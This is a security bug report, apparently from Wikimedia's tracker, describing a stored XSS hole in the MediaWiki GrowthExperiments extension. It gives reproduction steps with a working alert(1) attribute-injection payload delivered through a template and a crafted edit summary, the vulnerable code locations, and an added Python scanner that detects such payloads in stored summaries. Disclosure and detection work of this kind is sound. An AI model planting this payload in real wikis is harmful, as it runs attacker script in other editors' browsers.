The GrowthExperiments extension inserts parsed, user-controlled wikitext into autocomments, allowing for stored XSS to be performed by anybody who can edit.
## Reproduction steps
1. Install GrowthExperiments
2. Create `Template:AutocommentPayload` with `<pre tabindex="0" data-xss="[[#/autofocus/onfocus=alert(1);//">]]</pre>` as the contents
3. Edit an existing(!) page and set the edit summary to `/*growthexperiments-manage-mentors-summary-add-admin-no-reason:{{AutocommentPayload}}*/`
4. Click "Show changes"
{F70675855}
{F70675861}
The payload will also be executed in other places that render edit summaries, like `?action=history` or `Special:RecentChanges`.
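Because the stored summary is re-rendered everywhere edit summaries appear, a site operator who wants to find already-stored payloads can scan the `rc_comment`/revision comment text rather than the rendered pages. The following is an added example, not part of this report and not GrowthExperiments code: a small Python scanner that extracts the autocomment portion (`/* ... */`) of each summary and flags bodies containing template transclusion, HTML/parser tags or wikilink brackets, none of which belong in an autocomment that should only carry a section heading or a message key with plain parameters. The sample summaries are constructed; the third mirrors the shape of the summary in the reproduction steps.

```python
import re

# Constructed sample summaries (not taken from the report). Index 2 has the
# same shape as the summary used in the reproduction steps above; index 4
# carries HTML only in the free-text part, outside the autocomment.
SAMPLE_SUMMARIES = [
    "/* Introduction */ fixed typo",
    "/* growthexperiments-manage-mentors-summary-add-admin-no-reason:Alice */",
    "/*growthexperiments-manage-mentors-summary-add-admin-no-reason:{{AutocommentPayload}}*/",
    '/* Section <pre tabindex="0">x</pre> */ tidy',
    '/* Section */ <pre tabindex="0">x</pre>',
    "plain summary with no autocomment",
]

# Autocomment bodies are delimited by /* and */ (whitespace around the body is ignored).
AUTOCOMMENT_RE = re.compile(r"/\*\s*(.*?)\s*\*/")

# Heuristic: constructs that a legitimate autocomment never needs.
#   {{   template transclusion
#   <x   an HTML/parser tag (letter, '/', or '!' right after '<')
#   [[   wikilink brackets
SUSPICIOUS_RE = re.compile(r"\{\{|<[A-Za-z/!]|\[\[")


def find_autocomments(summary):
    """Return every autocomment body found in an edit summary."""
    return AUTOCOMMENT_RE.findall(summary)


def flag_summary(summary):
    """Return the suspicious autocomment bodies of a summary (empty list if clean).

    Only the autocomment part is inspected: that is the portion this report
    identifies as reaching a renderer that does not treat it as plain text.
    """
    return [body for body in find_autocomments(summary) if SUSPICIOUS_RE.search(body)]


def scan(summaries):
    """Return (index, summary, suspicious_bodies) for every summary that is flagged."""
    hits = []
    for i, summary in enumerate(summaries):
        bad = flag_summary(summary)
        if bad:
            hits.append((i, summary, bad))
    return hits


if __name__ == "__main__":
    for i, summary, bad in scan(SAMPLE_SUMMARIES):
        print(f"[{i}] {summary!r} -> suspicious autocomment(s): {bad}")
```

In practice the input would be the comment text of recent changes or revisions (for example exported via the API or read from the database); the scanner is a triage heuristic and the flagged summaries still need a human to decide whether they are the benign edge case of a section heading that happens to contain such characters.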
## Cause
The extension sets the autocomment to a parsed message with a user-provided param:
https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#277
Parsed HTML is not safe to use in edit summaries.
The XSS is also exploitable by users with the `editinterface` permission. There are 15 affected messages:
https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#259
https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/HomepageHooks.php#1249
Another message is inserted as text, allowing for stored XSS as well:
https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#252
## Explanation
The payload is explained in T409737, which is essentially the same issue (but not exploitable by unprivileged users).
## Additional information
* MediaWiki: 1.46.0-alpha
* GrowthExperiments: e510edc